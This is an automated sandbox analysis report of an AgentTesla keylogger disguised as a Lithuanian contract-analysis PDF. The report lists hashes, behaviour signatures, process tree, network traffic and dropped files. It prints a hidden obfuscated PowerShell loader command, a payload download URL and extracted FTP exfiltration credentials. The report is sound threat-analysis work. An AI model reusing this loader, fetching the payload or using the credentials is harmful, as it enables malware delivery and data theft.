Overview

overview

10

Static

static

1

Sutarčių...df.exe

windows7-x64

10

Sutarčių...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/12/2023, 01:11 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sutarčių analizė-pdf.exe

  • Size

    711KB

  • MD5

    102714cb47ab0624d79ed174a8231ad6

  • SHA1

    8991d7808c89d2c6209322b20ea4a8b75f78fb44

  • SHA256

    0da1ad1d456b5b7a028efcbfd9c3ee45af7c6830c87c1e7469faa089dbb0fe7e

  • SHA512

    7467ec91c266be688bf97f92a72068bf3271b1c58bf7ded76fce89fa93a8c06d631727b68c4938df57dbab3f0a07a0f6820f3587e87155a77e9d424e288b9bf2

  • SSDEEP

    12288:twFGHEOFmZPT0TRoi+kXjhk5na5hylgimtdYM3O0V7bbnL:t5HEOOPOaMd4na2lgZtub0V7z

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    bringlogsformoney@vvspijkenisse.nl
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Preciosity=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru';$Besvorne=$Preciosity.SubString(54587,3);.$Besvorne($Preciosity)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 1864
          4⤵
          • Program crash
          PID:3500
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1528 -ip 1528
    1⤵
      PID:372

    Network

    • flag-us
      DNS
      107.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.175.53.84.in-addr.arpa
      IN PTR
      Response
      107.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-107deploystaticakamaitechnologiescom
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      59.128.231.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      59.128.231.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.154.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.154.82.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      39.142.81.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      39.142.81.104.in-addr.arpa
      IN PTR
      Response
      39.142.81.104.in-addr.arpa
      IN PTR
      a104-81-142-39deploystaticakamaitechnologiescom
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.a-0001.a-msedge.net
      g-bing-com.a-0001.a-msedge.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D; domain=.bing.com; expires=Thu, 02-Jan-2025 01:11:31 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 81E44C06FED242F7B98C6995B843EC43 Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 1EEFBBFA81CB44738CFC44D90F823A5C Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 7ACC088C2BBD406EA460C5FA6734AD66 Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • flag-us
      DNS
      9.228.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.228.82.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      200.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.197.79.204.in-addr.arpa
      IN PTR
      Response
      200.197.79.204.in-addr.arpa
      IN PTR
      a-0001a-msedgenet
    • flag-us
      DNS
      43.58.199.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.58.199.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 341424
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0E7D56DE724045F5B293C11501536FE6 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 350318
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: CF410B85C9314B24A7DAFA78AD855DB9 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 427323
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 60AB4F6AE0584DD49C593244DBABB90C Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 373081
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0C8007C83AB64029B2C47401B8EEC592 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • flag-us
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      121.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.175.53.84.in-addr.arpa
      IN PTR
      Response
      121.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-121deploystaticakamaitechnologiescom
    • flag-us
      DNS
      spsc.sudurpashchim.gov.np
      msbuild.exe
      Remote address:
      8.8.8.8:53
      Request
      spsc.sudurpashchim.gov.np
      IN A
      Response
      spsc.sudurpashchim.gov.np
      IN A
      202.45.144.24
    • flag-np
      GET
      http://spsc.sudurpashchim.gov.np/geo.bin
      msbuild.exe
      Remote address:
      202.45.144.24:80
      Request
      GET /geo.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
      Host: spsc.sudurpashchim.gov.np
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sat, 09 Dec 2023 01:12:24 GMT
      Server: Apache
      Last-Modified: Fri, 08 Dec 2023 05:27:55 GMT
      Accept-Ranges: bytes
      Content-Length: 239168
      Content-Type: application/octet-stream
    • flag-us
      DNS
      24.144.45.202.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.144.45.202.in-addr.arpa
      IN PTR
      Response
      24.144.45.202.in-addr.arpa
      IN PTR
      webcpanel2nitcgovnp
    • flag-us
      DNS
      24.144.45.202.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.144.45.202.in-addr.arpa
      IN PTR
      Response
      24.144.45.202.in-addr.arpa
      IN PTR
      webcpanel2nitcgovnp
    • flag-us
      DNS
      122.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      122.175.53.84.in-addr.arpa
      IN PTR
      Response
      122.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-122deploystaticakamaitechnologiescom
    • flag-us
      DNS
      48.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      48.229.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      136.71.105.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      136.71.105.51.in-addr.arpa
      IN PTR
      Response
    • 204.79.197.200:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      tls, http2
      1.9kB
       9.3kB
       22
      18

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204
    • 204.79.197.200:443
      https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4
      tls, http2
      57.0kB
       1.6MB
       1134
      1128

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.3kB
       16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.3kB
       16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.3kB
       16
      14
    • 202.45.144.24:80
      http://spsc.sudurpashchim.gov.np/geo.bin
      http
      msbuild.exe
      8.5kB
       246.6kB
       182
      180

      HTTP Request

      GET http://spsc.sudurpashchim.gov.np/geo.bin

      HTTP Response

      200
    • 52.111.227.14:443
      322 B
       7
    • 8.8.8.8:53
      107.175.53.84.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      107.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      59.128.231.4.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      59.128.231.4.in-addr.arpa

    • 8.8.8.8:53
      241.154.82.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      241.154.82.20.in-addr.arpa

    • 8.8.8.8:53
      39.142.81.104.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      39.142.81.104.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
       158 B
       1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      9.228.82.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      9.228.82.20.in-addr.arpa

    • 8.8.8.8:53
      200.197.79.204.in-addr.arpa
      dns
      73 B
       106 B
       1
      1

      DNS Request

      200.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      43.58.199.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      43.58.199.20.in-addr.arpa

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
       173 B
       1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
       144 B
       1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      121.175.53.84.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      121.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      spsc.sudurpashchim.gov.np
      dns
      msbuild.exe
      71 B
       87 B
       1
      1

      DNS Request

      spsc.sudurpashchim.gov.np

      DNS Response

      202.45.144.24

    • 8.8.8.8:53
      24.144.45.202.in-addr.arpa
      dns
      144 B
       216 B
       2
      2

      DNS Request

      24.144.45.202.in-addr.arpa

      DNS Request

      24.144.45.202.in-addr.arpa

    • 8.8.8.8:53
      122.175.53.84.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      122.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      48.229.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      48.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      136.71.105.51.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      136.71.105.51.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeubztba.53b.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Colorimetric\Indtappende\Hngekjeeffekt\Fradragendes.Att
      Filesize

      306KB

      MD5

      4e478447d9bbee96f0f4363fa03f3646

      SHA1

      ccd297ac9497fda8c12fab076d1871f1241113e8

      SHA256

      3d957ab6b870abeabd8f1c19cb39ed6ca54b6cece2a7d8610826a64c67654fd5

      SHA512

      f1e7db8f2dbc147832c41bb95965cf8d8359b1980a433e9a8325e773d307310538f97349fd0d8ca3658184ea3d46eb5177125117c4b863f490f116938ba71320

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru
      Filesize

      53KB

      MD5

      069fd38747b58c05cc92771b20ff6206

      SHA1

      be3b1d1460ac825103741964b76e1883f59fb8fa

      SHA256

      640d92dda0382f293796ccfc9c51d21da8c24bba7c8c12d8e189c9fdeb4dda64

      SHA512

      1f35e64354054a374215fb5013dcbd3835ae216a999e63736a6aeeb88184cce7c67801be09a9db3f830d50174ccb08d4afc67a21d47f3a889b279d781ba98b57

      Download Submit

    • memory/1528-189-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1528-197-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1528-195-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/1528-194-0x0000000022760000-0x0000000022770000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1528-192-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1528-193-0x000000006E800000-0x000000006E840000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1528-190-0x0000000000A30000-0x00000000047C9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/1528-187-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/1528-188-0x00000000776E8000-0x00000000776E9000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1528-186-0x000000006E800000-0x000000006FA54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/2428-168-0x00000000062B0000-0x00000000062FC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2428-185-0x0000000077661000-0x0000000077781000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/2428-172-0x00000000064F0000-0x0000000006512000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2428-173-0x00000000075B0000-0x0000000007B54000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2428-150-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-149-0x00000000029A0000-0x00000000029D6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2428-151-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-170-0x0000000006F60000-0x0000000006FF6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/2428-179-0x0000000073A00000-0x00000000741B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2428-180-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-182-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2428-183-0x0000000008860000-0x000000000C5F9000-memory.dmp

      Filesize

      61.6MB

      Download

    • memory/2428-184-0x0000000002990000-0x00000000029A0000-memory.dmp

      Filesize

      64KB

      Download

